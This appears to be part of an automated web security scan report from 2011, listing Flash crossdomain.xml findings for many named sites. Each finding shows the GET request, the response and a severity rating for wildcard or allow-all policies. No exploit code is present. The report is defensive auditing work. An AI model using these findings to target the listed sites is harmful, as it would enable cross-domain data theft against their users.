Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thehothits.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:26:08 GMT
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.3
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="take40.com"/>
...[SNIP]...
<allow-access-from domain="*.take40.com"/>
...[SNIP]...
<allow-access-from domain="test.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="mcmentertainment.com"/>
...[SNIP]...
<allow-access-from domain="*.mcmentertainment.com"/>
...[SNIP]...
<allow-access-from domain="mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="finishjob.com"/>
...[SNIP]...
<allow-access-from domain="*.finishjob.com"/>
...[SNIP]...
<allow-access-from domain="acnecanbecured.com.au"/>
...[SNIP]...
<allow-access-from domain="*.acnecanbecured.com.au"/>
...[SNIP]...
<allow-access-from domain="monsterhousecompetition.com.au"/>
...[SNIP]...
<allow-access-from domain="*.monsterhousecompetition.com.au"/>
...[SNIP]...
<allow-access-from domain="getintothegroove.com.au"/>
...[SNIP]...
<allow-access-from domain="*.getintothegroove.com.au"/>
...[SNIP]...
<allow-access-from domain="optus.com.au"/>
...[SNIP]...
<allow-access-from domain="*.optus.com.au"/>
...[SNIP]...
<allow-access-from domain="cornetto.com.au"/>
...[SNIP]...
<allow-access-from domain="*.cornetto.com.au"/>
...[SNIP]...
<allow-access-from domain="noboringbits.com"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.com"/>
...[SNIP]...
<allow-access-from domain="noboringbits.com.au"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.com.au"/>
...[SNIP]...
<allow-access-from domain="noboringbits.co.nz"/>
...[SNIP]...
<allow-access-from domain="*.noboringbits.co.nz"/>
...[SNIP]...
<allow-access-from domain="partystarters.net.au"/>
...[SNIP]...
<allow-access-from domain="*.partystarters.net.au"/>
...[SNIP]...
<allow-access-from domain="*.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.preview.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="*.planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="planetrockevolution.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.boostfreenights.com.au"/>
...[SNIP]...
<allow-access-from domain="syndplayer.take40.com"/>
...[SNIP]...
<allow-access-from domain="syndplayer.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.famousfirstjobs.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.famousfirstjobs.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.take40.com"/>
...[SNIP]...
<allow-access-from domain="freedomwriters.take40.com"/>
...[SNIP]...
<allow-access-from domain="test.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="test.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="services.legioninteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.livelounge.com.au"/>
...[SNIP]...
<allow-access-from domain="www.livelounge.com.au"/>
...[SNIP]...
<allow-access-from domain="ad.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.mcmstudios.com.au"/>
...[SNIP]...
<allow-access-from domain="mcmstudios.com.au"/>
...[SNIP]...
<allow-access-from domain="videoezy.take40.com"/>
...[SNIP]...
<allow-access-from domain="www.videoezy.take40.com"/>
...[SNIP]...
<allow-access-from domain="offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="preview.offer.take40.com"/>
...[SNIP]...
<allow-access-from domain="preview.take40.com"/>
...[SNIP]...
<allow-access-from domain="www.take40.com"/>
...[SNIP]...
<allow-access-from domain="bbowes.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="hippo.dev.areeba.com.au"/>
...[SNIP]...
<allow-access-from domain="www.hippo.com.au"/>
...[SNIP]...
<allow-access-from domain="www.googleadservices.com"/>
...[SNIP]...
<allow-access-from domain="*.liveatthechapel.com"/>
...[SNIP]...
<allow-access-from domain="anikolov.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="archive.liveatthechapel.com"/>
...[SNIP]...
<allow-access-from domain="*.staging.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="offer.take40.com"/>
...[SNIP]...
<allow-access-from domain="*.xmaswishlist.com.au"/>
...[SNIP]...
<allow-access-from domain="*.condoms.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.christmaswishlist.com.au "/>
...[SNIP]...
<allow-access-from domain="staging.jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="www.jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="jonathancolemanexperience.com"/>
...[SNIP]...
<allow-access-from domain="www.legendsofrock.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.legendsofrock.com.au"/>
...[SNIP]...
<allow-access-from domain="offer.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="*.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="www.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="preview.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="test.planetrock.com.au"/>
...[SNIP]...
<allow-access-from domain="*.myspace.com"/>
...[SNIP]...
<allow-access-from domain="www.myspace.com"/>
...[SNIP]...
<allow-access-from domain="facebook.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="staging.facebook.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="*.liveatthechapel.com.au"/>
...[SNIP]...
<allow-access-from domain="local.take40.com"/>
...[SNIP]...
<allow-access-from domain="ds.serving-sys.com"/>
...[SNIP]...
<allow-access-from domain="bs.serving-sys.com"/>
...[SNIP]...
<allow-access-from domain="dev.take40.com"/>
...[SNIP]...
<allow-access-from domain="image.take40.com"/>
...[SNIP]...
<allow-access-from domain="singstar.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="staging.knockedupthemovie.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="www.mygeneration.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.mygeneration.com.au"/>
...[SNIP]...
<allow-access-from domain="ad.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="114.111.133.74"/>
...[SNIP]...
<allow-access-from domain="http://*.notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="*.notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.jonoanddano.com.au"/>
...[SNIP]...
<allow-access-from domain="jonoanddano.com.au"/>
...[SNIP]...
<allow-access-from domain="*.beinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="boost.com.au"/>
...[SNIP]...
<allow-access-from domain="*.justdancegame.com.au"/>
...[SNIP]...
<allow-access-from domain="*.exigaholiday.com"/>
...[SNIP]...
<allow-access-from domain="http://local.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.movideo.com"/>
...[SNIP]...
8.64. http://www.trilulilu.ro/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trilulilu.ro
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trilulilu.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:05 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 11:02:32 GMT
ETag: "7f932a-4e-49df68c86c200"
Accept-Ranges: bytes
Content-Length: 78
Connection: close
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
8.65. http://www.tutorialized.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tutorialized.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 18:09:34 GMT
ETag: "394fa93-63-48abbf4989380"
Accept-Ranges: bytes
Content-Length: 99
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.66. http://www.virtual-hairstyles.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtual-hairstyles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.virtual-hairstyles.com

Response

HTTP/1.1 200 OK
Content-Length: 204
Content-Type: text/xml
Last-Modified: Mon, 22 Nov 2010 06:27:43 GMT
Accept-Ranges: bytes
ETag: "36d5df5ee8acb1:c95b2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
8.67. http://www.weddings.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weddings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weddings.com

Response

HTTP/1.1 200 OK
Age: 45
Date: Mon, 02 May 2011 00:28:37 GMT
Cache-Control: max-age=86400
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "9d4045cd8fffcb1:44e8"
Content-Length: 207
Content-Type: text/xml
Last-Modified: Wed, 20 Apr 2011 19:18:59 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
box: 03
X-Powered-By: ASP.NET

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
8.68. http://www.wmms.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wmms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wmms.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3082424437
X-Cache-Server: varnish04
Expires: Sun, 01 May 2011 23:29:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:29:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.69. http://www.wsfa.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wsfa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wsfa.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:52:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:52:50 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
8.70. http://www.wtoc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wtoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtoc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9bf"
Cteonnt-Length: 208
Expires: Sun, 01 May 2011 23:42:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:42:07 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
8.71. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:00:44 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 418
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
8.72. http://ads-vrx.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads-vrx.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:20:04 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...
8.73. http://ads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 02 May 2011 01:57:00 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...
8.74. http://ads2.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads2.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...
8.75. http://adx.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 02 May 2011 02:00:56 GMT
Expires: Tue, 03 May 2011 02:00:56 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
8.76. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...
8.77. http://csct.att.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://csct.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: csct.att.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:18 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 07 Jan 2009 00:40:16 GMT
ETag: "344769-20f-c47e5c00"
Accept-Ranges: bytes
Content-Length: 527
P3P: policyref="http://csct.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAaPSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.sbc.com" />
<allow-access-from domain="*.rodgerstownsend.com" />
<allow-access-from domain="*.attonlinevault.com" />
<allow-access-from domain="*.attyourworld.com" />
<allow-access-from domain="*.youratt.com" />
<allow-access-from domain="youratt.com" />
...[SNIP]...
8.78. http://d.chango.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.chango.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.chango.com

Response

HTTP/1.0 200 OK
Content-Length: 190
Etag: "6652b063ccbb23f87f48301640c5b4ceaed7aadc"
Content-Type: text/xml
Server: Chango RTB Server

<?xml version="1.0"?>
<!-- http://as.chango.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.chango.com" />
</cross-domain-policy>
8.79. http://geo.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
